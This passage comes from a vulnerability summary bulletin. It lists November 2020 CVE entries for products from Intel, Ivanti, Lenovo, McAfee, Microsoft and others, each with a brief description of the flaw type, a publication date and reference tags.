Insufficient access control in the Linux kernel driver for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-8694
MISC
intel — processors
 
Improper access control in the PMC for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-13 not yet calculated CVE-2020-0599
MISC
intel — processors
 
Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0593
CONFIRM
MISC
intel — processors
 
Improper removal of sensitive information before storage or transfer in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-8696
CONFIRM
MISC
intel — processors
 
Use of potentially dangerous function in Intel BIOS platform sample code for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8739
MISC
intel — processors
 
Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8738
MISC
intel — processors
 
Improper isolation of shared resources in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-8698
CONFIRM
MISC
intel — proset/wireless_wifi_products Improper buffer restriction in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-12317
MISC
intel — proset/wireless_wifi_products Insufficient control flow management in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-12319
MISC
intel — proset/wireless_wifi_products
 
Improper input validation in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-12314
MISC
intel — proset/wireless_wifi_products
 
Insufficient control flow management in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. 2020-11-13 not yet calculated CVE-2020-12313
MISC
intel — proset/wireless_wifi_products
 
Protection mechanism failure in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12318
MISC
intel — qat
 
Insufficiently protected credentials in the Intel(R) QAT for Linux before version 1.7.l.4.10.0 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12333
MISC
intel — quartus_prime
 
Uncaught exception in the Intel(R) 50GbE IP Core for Intel(R) Quartus Prime before version 20.2 may allow an authenticated user to potentially enable denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8767
MISC
intel — quartus_prime_pro_edition
 
Improper Restriction of XML External Entity Reference in subsystem forIntel(R) Quartus(R) Prime Pro Edition before version 20.3 and Intel(R) Quartus(R) Prime Standard Edition before version 20.2 may allow unauthenticated user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-24454
MISC
intel — realsense_d400_series_dynamic_calibration_tool
 
Incorrect default permissions in the Intel(R) RealSense(TM) D400 Series Dynamic Calibration Tool before version 2.11, may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12306
MISC
intel — scs_add-on_for_microsoft_sccm
 
Uncontrolled search path in Intel(R) SCS Add-on for Microsoft* SCCM before version 2.1.10 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12320
MISC
intel — server_board_2600st_and_s2600wf
 
Improper input validation in the firmware for Intel(R) Server Board S2600ST and S2600WF families may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0572
MISC
intel — sgx_dcap
 
Improper conditions check in the Intel(R) SGX DCAP software before version 1.6 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-8766
MISC
intel — stratix_10_fpga_firmware
 
Improper buffer restrictions in the Intel(R) Stratix(R) 10 FPGA firmware provided with the Intel(R) Quartus(R) Prime Pro software before version 20.2 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2020-11-12 not yet calculated CVE-2020-12312
MISC
intel — stratix_10_fpga_firmware
 
Improper buffer restrictions in the Intel(R) Stratix(R) 10 FPGA firmware provided with the Intel(R) Quartus(R) Prime Pro software before version 20.1 may allow an unauthenticated user to potentially enable escalation of privilege and/or information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-8737
MISC
intel — thunderbolt_dch_drivers Insecure default variable initialization in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow a privileged user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-12327
MISC
intel — thunderbolt_dch_drivers
 
Improper buffer restrictions in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12325
MISC
intel — thunderbolt_dch_drivers
 
Improper initialization in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-12326
MISC
intel — thunderbolt_dch_drivers
 
Protection mechanism failure in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow a privileged user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-12328
MISC
intel — thunderbolt_dch_drivers
 
Protection mechanism failure in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12324
MISC
intel — txe
 
Authentication bypass by capture-replay in RPMB protocol message authentication subsystem in Intel(R) TXE versions before 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2020-11-12 not yet calculated CVE-2020-12355
CONFIRM
MISC
intel — txe
 
Use after free in Kernel Mode Driver for Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8750
CONFIRM
MISC
intel — unite_client
 
Improper buffer restrictions in the Intel(R) Unite Client for Windows* before version 4.2.13064 may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-0575
MISC
intel — unite_cloud_service_client
 
Improper access controls in Intel Unite(R) Cloud Service client before version 4.2.12212 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12331
MISC
intel — visual_compute_accelerator
 
Improper access control in the Intel(R) Visual Compute Accelerator 2, all versions, may allow a privileged user to potentially enable denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8677
MISC
intel — visual_compute_accelerator
 
Improper access control in the Intel(R) Visual Compute Accelerator 2, all versions, may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8676
MISC
intel — vtune_profiler
 
Uncontrolled search path in the Intel(R) VTune(TM) Profiler before version 2020 Update 1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12329
MISC
intel — wireless_bluetooth_products
 
Improper input validation in some Intel(R) Wireless Bluetooth(R) products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-12322
MISC
intel — wireless_bluetooth_products
 
Improper buffer restriction in some Intel(R) Wireless Bluetooth(R) products before version 21.110 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. 2020-11-12 not yet calculated CVE-2020-12321
MISC
intel — xtu
 
Improper access control in the Intel(R) XTU before version 6.5.1.360 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12350
MISC
intelliants — subrion_cms Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins. 2020-11-10 not yet calculated CVE-2019-7357
MISC
MISC
ivanti — endpoint_manager An unrestricted file-upload issue in EditLaunchPadDialog.aspx in Ivanti Endpoint Manager 2019.1 and 2020.1 allows an authenticated attacker to gain remote code execution by uploading a malicious aspx file. The issue is caused by insufficient file extension validation and insecure file operations on the uploaded image, which upon failure will leave the temporarily created files in an accessible location on the server. 2020-11-12 not yet calculated CVE-2020-13774
MISC
ivanti — endpoint_manager
 
Several services are accessing named pipes in Ivanti Endpoint Manager through 2020.1.1 with default or overly permissive security attributes; as these services run as user ‘NT AUTHORITYSYSTEM’, the issue can be used to escalate privileges from a local standard or service account having SeImpersonatePrivilege (eg. user ‘NT AUTHORITYNETWORK SERVICE’). 2020-11-12 not yet calculated CVE-2020-13770
MISC
ivanti — endpoint_manager
 
Various components in Ivanti Endpoint Manager through 2020.1.1 rely on Windows search order when loading a (nonexistent) library file, allowing (under certain conditions) one to gain code execution (and elevation of privileges to the level of privilege held by the vulnerable component such as NT AUTHORITYSYSTEM) via DLL hijacking. This affects ldiscn32.exe, IpmiRedirectionService.exe, LDAPWhoAmI.exe, and ldprofile.exe. 2020-11-12 not yet calculated CVE-2020-13771
MISC
json-ptr — json-ptr
 
This affects all versions of package json-ptr. The issue occurs in the set operation (https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.htmlset) when the force flag is set to true. The function recursively set the property in the target object, however it does not properly check the key being set, leading to a prototype pollution. 2020-11-10 not yet calculated CVE-2020-7766
MISC
MISC
MISC
json8 — json8
 
This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution. 2020-11-12 not yet calculated CVE-2020-7770
MISC
MISC
json8-merge_patch — json8-merge_patch Prototype pollution vulnerability in json8-merge-patch npm package < 1.0.3 may allow attackers to inject or modify methods and properties of the global object constructor. 2020-11-09 not yet calculated CVE-2020-8268
MISC
lenovo — desktop
 
Prior to August 10, 2020, some Lenovo Desktop and Workstation systems were shipped with the Embedded Host Based Configuration (EHBC) feature of Intel AMT enabled. This could allow an administrative user with local access to configure Intel AMT. 2020-11-11 not yet calculated CVE-2020-8353
MISC
lenovo — desktop
 
In some Lenovo Desktop models, the Configuration Change Detection BIOS setting failed to detect SATA configuration changes. 2020-11-11 not yet calculated CVE-2020-8352
MISC
lenovo — multiple_notebooks
 
A potential vulnerability in the SMI callback function used in the VariableServiceSmm driver in some Lenovo Notebook models may allow arbitrary code execution. 2020-11-11 not yet calculated CVE-2020-8354
MISC
lettre_library — lettre_library
 
The lettre library through 0.10.0-alpha for Rust allows arbitrary sendmail option injection via transport/sendmail/mod.rs. 2020-11-12 not yet calculated CVE-2020-28247
MISC
MISC
lg — multiple_mobile_devices An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. System services may crash because of the lack of a NULL parameter check. The LG ID is LVE-SMP-200024 (November 2020). 2020-11-08 not yet calculated CVE-2020-28344
MISC
lg — multiple_mobile_devices
 
An issue was discovered on LG mobile devices with Android OS 10 software. The Wi-Fi subsystem may crash because of the lack of a NULL parameter check. The LG ID is LVE-SMP-200025 (November 2020). 2020-11-08 not yet calculated CVE-2020-28345
MISC
libmaxminddb — libmaxminddb
 
libmaxminddb before 1.4.3 has a heap-based buffer over-read in dump_entry_data_list in maxminddb.c. 2020-11-06 not yet calculated CVE-2020-28241
MISC
MISC
MISC
MLIST
GENTOO
locust — locust
 
A stored cross-site scripting (XSS) vulnerability affects the Web UI in Locust before 1.3.2, if the installation violates the usage expectations by exposing this UI to outside users. 2020-11-09 not yet calculated CVE-2020-28364
MISC
managedclusterview_api — managedclusterview_api An issue was discovered in ManagedClusterView API, that could allow secrets to be disclosed to users without the correct permissions. Views created for an admin user would be made available for a short time to users with only view permission. In this short time window the user with view permission could read cluster secrets that should only be disclosed to admin users. 2020-11-09 not yet calculated CVE-2020-25655
CONFIRM
mcafee — endpoint_security Unquoted service executable path in McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows local users to cause a denial of service and malicious file execution via carefully crafted and named executable files. 2020-11-12 not yet calculated CVE-2020-7331
CONFIRM
mcafee — endpoint_security
 
Cross site scripting vulnerability in the firewall ePO extension of McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows administrators to inject arbitrary web script or HTML via the configuration wizard. 2020-11-12 not yet calculated CVE-2020-7333
CONFIRM
mcafee — endpoint_security
 
Cross Site Request Forgery vulnerability in the firewall ePO extension of McAfee Endpoint Security (ENS) prior to 10.7.0 November 2020 Update allows an attacker to execute arbitrary HTML code due to incorrect security configuration. 2020-11-12 not yet calculated CVE-2020-7332
CONFIRM
mcafee — mvision_endpoint
 
Server-side request forgery vulnerability in the ePO extension in McAfee MVISION Endpoint prior to 20.11 allows remote attackers trigger server-side DNS requests to arbitrary domains via carefully constructed XML files loaded by an ePO administrator. 2020-11-11 not yet calculated CVE-2020-7329
CONFIRM
mcafee — mvision_endpoint
 
External entity attack vulnerability in the ePO extension in McAfee MVISION Endpoint prior to 20.11 allows remote attackers to gain control of a resource or trigger arbitrary code execution via improper input validation of an HTTP request, where the content for the attack has been loaded into ePO by an ePO administrator. 2020-11-11 not yet calculated CVE-2020-7328
CONFIRM
mersive — solstice-pod
 
Solstice-Pod up to 5.0.2 WEBRTC server mishandles the format-string specifiers %x; %p; %c and %s in the screen_key, display_name, browser_name, and operation_system parameter during the authentication process. This may crash the server and force Solstice-Pod to reboot, which leads to a denial of service. 2020-11-11 not yet calculated CVE-2020-27523
MISC
MISC
MISC
MISC
microsoft — av1_video_extension
 
AV1 Video Extension Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17105
MISC
microsoft — azure_sphere Azure Sphere Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16985. 2020-11-11 not yet calculated CVE-2020-16990
MISC
MISC
microsoft — azure_sphere Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16989, CVE-2020-16992, CVE-2020-16993. 2020-11-11 not yet calculated CVE-2020-16988
MISC
microsoft — azure_sphere Azure Sphere Denial of Service Vulnerability 2020-11-11 not yet calculated CVE-2020-16986
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16989, CVE-2020-16992. 2020-11-11 not yet calculated CVE-2020-16993
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Tampering Vulnerability 2020-11-11 not yet calculated CVE-2020-16983
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994. 2020-11-11 not yet calculated CVE-2020-16984
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16990. 2020-11-11 not yet calculated CVE-2020-16985
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16991, CVE-2020-16994. 2020-11-11 not yet calculated CVE-2020-16987
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16994. 2020-11-11 not yet calculated CVE-2020-16991
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16989, CVE-2020-16993. 2020-11-11 not yet calculated CVE-2020-16992
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991. 2020-11-11 not yet calculated CVE-2020-16994
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16988, CVE-2020-16989, CVE-2020-16992, CVE-2020-16993. 2020-11-11 not yet calculated CVE-2020-16981
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16982, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994. 2020-11-11 not yet calculated CVE-2020-16970
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Unsigned Code Execution Vulnerability This CVE ID is unique from CVE-2020-16970, CVE-2020-16984, CVE-2020-16987, CVE-2020-16991, CVE-2020-16994. 2020-11-11 not yet calculated CVE-2020-16982
MISC
MISC
MISC
microsoft — azure_sphere
 
Azure Sphere Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16981, CVE-2020-16988, CVE-2020-16992, CVE-2020-16993. 2020-11-11 not yet calculated CVE-2020-16989
MISC
microsoft — defender
 
Microsoft Defender for Endpoint Security Feature Bypass Vulnerability 2020-11-11 not yet calculated CVE-2020-17090
MISC
microsoft — dynamics_365 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17006, CVE-2020-17021. 2020-11-11 not yet calculated CVE-2020-17018
MISC
microsoft — dynamics_365 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17018, CVE-2020-17021. 2020-11-11 not yet calculated CVE-2020-17006
MISC
microsoft — dynamics_365
 
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17005, CVE-2020-17006, CVE-2020-17018. 2020-11-11 not yet calculated CVE-2020-17021
MISC
microsoft — dynamics_365
 
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability This CVE ID is unique from CVE-2020-17006, CVE-2020-17018, CVE-2020-17021. 2020-11-11 not yet calculated CVE-2020-17005
MISC
microsoft — edge
 
Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17048. 2020-11-11 not yet calculated CVE-2020-17054
MISC
microsoft — edge
 
Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17054. 2020-11-11 not yet calculated CVE-2020-17048
MISC
microsoft — edge_and_internet_explorer
 
Scripting Engine Memory Corruption Vulnerability 2020-11-11 not yet calculated CVE-2020-17052
MISC
microsoft — excel
 
Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17064, CVE-2020-17066. 2020-11-11 not yet calculated CVE-2020-17065
MISC
microsoft — excel
 
Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17065, CVE-2020-17066. 2020-11-11 not yet calculated CVE-2020-17064
MISC
microsoft — excel
 
Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17064, CVE-2020-17065, CVE-2020-17066. 2020-11-11 not yet calculated CVE-2020-17019
MISC
microsoft — excel
 
Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17019, CVE-2020-17064, CVE-2020-17065. 2020-11-11 not yet calculated CVE-2020-17066
MISC
microsoft — excel
 
Microsoft Excel Security Feature Bypass Vulnerability 2020-11-11 not yet calculated CVE-2020-17067
MISC
microsoft — exchange_server Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17083. 2020-11-11 not yet calculated CVE-2020-17084
MISC
microsoft — exchange_server
 
Microsoft Exchange Server Denial of Service Vulnerability 2020-11-11 not yet calculated CVE-2020-17085
MISC
microsoft — exchange_server
 
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17084. 2020-11-11 not yet calculated CVE-2020-17083
MISC
microsoft — heif_image_extension
 
HEIF Image Extensions Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17101
MISC
microsoft — hevc_video_extension HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17109, CVE-2020-17110. 2020-11-11 not yet calculated CVE-2020-17108
MISC
microsoft — hevc_video_extension
 
HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17108, CVE-2020-17109, CVE-2020-17110. 2020-11-11 not yet calculated CVE-2020-17107
MISC
microsoft — hevc_video_extension
 
HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17108, CVE-2020-17109. 2020-11-11 not yet calculated CVE-2020-17110
MISC
microsoft — hevc_video_extension
 
HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17108, CVE-2020-17110. 2020-11-11 not yet calculated CVE-2020-17109
MISC
microsoft — hevc_video_extension
 
HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17107, CVE-2020-17108, CVE-2020-17109, CVE-2020-17110. 2020-11-11 not yet calculated CVE-2020-17106
MISC
microsoft — internet_explorer
 
Internet Explorer Memory Corruption Vulnerability 2020-11-11 not yet calculated CVE-2020-17053
MISC
microsoft — office
 
Microsoft Office Online Spoofing Vulnerability 2020-11-11 not yet calculated CVE-2020-17063
MISC
microsoft — office
 
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17062
MISC
microsoft — raw_image_extension Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17079, CVE-2020-17086. 2020-11-11 not yet calculated CVE-2020-17082
MISC
microsoft — raw_image_extension
 
Microsoft Raw Image Extension Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17081
MISC
microsoft — raw_image_extension
 
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17082, CVE-2020-17086. 2020-11-11 not yet calculated CVE-2020-17079
MISC
microsoft — raw_image_extension
 
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17078, CVE-2020-17079, CVE-2020-17082. 2020-11-11 not yet calculated CVE-2020-17086
MISC
microsoft — raw_image_extension
 
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17079, CVE-2020-17082, CVE-2020-17086. 2020-11-11 not yet calculated CVE-2020-17078
MISC
microsoft — sharepoint
 
Microsoft SharePoint Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-16979. 2020-11-11 not yet calculated CVE-2020-17017
MISC
microsoft — sharepoint
 
Microsoft SharePoint Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17061
MISC
microsoft — sharepoint
 
Microsoft SharePoint Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17017. 2020-11-11 not yet calculated CVE-2020-16979
MISC
microsoft — sharepoint
 
Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17016, CVE-2020-17060. 2020-11-11 not yet calculated CVE-2020-17015
MISC
microsoft — sharepoint
 
Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17015, CVE-2020-17016. 2020-11-11 not yet calculated CVE-2020-17060
MISC
microsoft — sharepoint
 
Microsoft SharePoint Spoofing Vulnerability This CVE ID is unique from CVE-2020-17015, CVE-2020-17060. 2020-11-11 not yet calculated CVE-2020-17016
MISC
microsoft — teams
 
Microsoft Teams Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17091
MISC
microsoft — visual_studio
 
Visual Studio Tampering Vulnerability 2020-11-11 not yet calculated CVE-2020-17100
MISC
microsoft — visual_studio_code
 
Visual Studio Code JSHint Extension Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17104
MISC
microsoft — webp_image_extension
 
WebP Image Extensions Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17102
MISC
microsoft — windows
 
Windows Spoofing Vulnerability 2020-11-11 not yet calculated CVE-2020-1599
MISC
microsoft — windows_10 Windows Port Class Library Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17011
MISC
microsoft — windows_10 Windows GDI+ Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17068
MISC
microsoft — windows_10 Windows Bind Filter Driver Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17012
MISC
microsoft — windows_10 Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17038. 2020-11-11 not yet calculated CVE-2020-17010
MISC
microsoft — windows_10 Windows Win32k Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17057
MISC
microsoft — windows_10 Windows Graphics Component Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17004
MISC
microsoft — windows_10 Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17001. 2020-11-11 not yet calculated CVE-2020-17014
MISC
microsoft — windows_10 Windows NDIS Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17069
MISC
microsoft — windows_10 Windows Canonical Display Driver Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17029
MISC
microsoft — windows_10 Windows Delivery Optimization Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17071
MISC
microsoft — windows_10 Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17074, CVE-2020-17076. 2020-11-11 not yet calculated CVE-2020-17073
MISC
microsoft — windows_10 Windows MSCTF Server Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17030
MISC
microsoft — windows_10
 
Windows Print Configuration Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17041
MISC
microsoft — windows_10
 
Windows WalletService Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17037
MISC
microsoft — windows_10
 
Windows WalletService Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-16999
MISC
microsoft — windows_10
 
Win32k Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17013
MISC
microsoft — windows_10
 
Windows Hyper-V Security Feature Bypass Vulnerability 2020-11-11 not yet calculated CVE-2020-17040
MISC
microsoft — windows_10
 
Windows Function Discovery SSDP Provider Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17036
MISC
microsoft — windows_10
 
Incorrect file permissions in BlueStacks 4 through 4.230 on Windows allow a local attacker to escalate privileges by modifying a file that is later executed by a higher-privileged user. 2020-11-10 not yet calculated CVE-2020-24367
CONFIRM
microsoft — windows_10
 
Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17024
MISC
microsoft — windows_10
 
Windows Kernel Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17035
MISC
microsoft — windows_10
 
Windows Network File System Denial of Service Vulnerability 2020-11-11 not yet calculated CVE-2020-17047
MISC
microsoft — windows_10
 
Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17073, CVE-2020-17074. 2020-11-11 not yet calculated CVE-2020-17076
MISC
microsoft — windows_10
 
Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17010. 2020-11-11 not yet calculated CVE-2020-17038
MISC
microsoft — windows_10
 
Windows Camera Codec Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17113
MISC
MISC
microsoft — windows_10
 
Windows Error Reporting Denial of Service Vulnerability 2020-11-11 not yet calculated CVE-2020-17046
MISC
microsoft — windows_10
 
Remote Desktop Protocol Server Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-16997
MISC
microsoft — windows_10
 
Windows Error Reporting Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17007
MISC
microsoft — windows_10
 
Microsoft Browser Memory Corruption Vulnerability 2020-11-11 not yet calculated CVE-2020-17058
MISC
microsoft — windows_10
 
Windows USO Core Worker Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17075
MISC
microsoft — windows_10
 
Windows Update Medic Service Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17070
MISC
microsoft — windows_10
 
Windows Network File System Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17051
MISC
microsoft — windows_10
 
Windows Common Log File System Driver Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17088
MISC
microsoft — windows_10
 
Windows Kernel Local Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17087
MISC
microsoft — windows_10
 
Windows Print Spooler Remote Code Execution Vulnerability 2020-11-11 not yet calculated CVE-2020-17042
MISC
microsoft — windows_10
 
Windows Update Stack Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-17077
MISC
microsoft — windows_10
 
Windows Network File System Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17056
MISC
microsoft — windows_10
 
Windows Update Orchestrator Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17073, CVE-2020-17076. 2020-11-11 not yet calculated CVE-2020-17074
MISC
microsoft — windows_10
 
Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17014. 2020-11-11 not yet calculated CVE-2020-17001
MISC
microsoft — windows_10
 
Windows KernelStream Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17045
MISC
microsoft — windows_10
 
DirectX Elevation of Privilege Vulnerability 2020-11-11 not yet calculated CVE-2020-16998
MISC
microsoft — windows_10
 
Remote Desktop Protocol Client Information Disclosure Vulnerability 2020-11-11 not yet calculated CVE-2020-17000
MISC
microsoft — windows_server
 
Kerberos Security Feature Bypass Vulnerability 2020-11-11 not yet calculated CVE-2020-17049
MISC
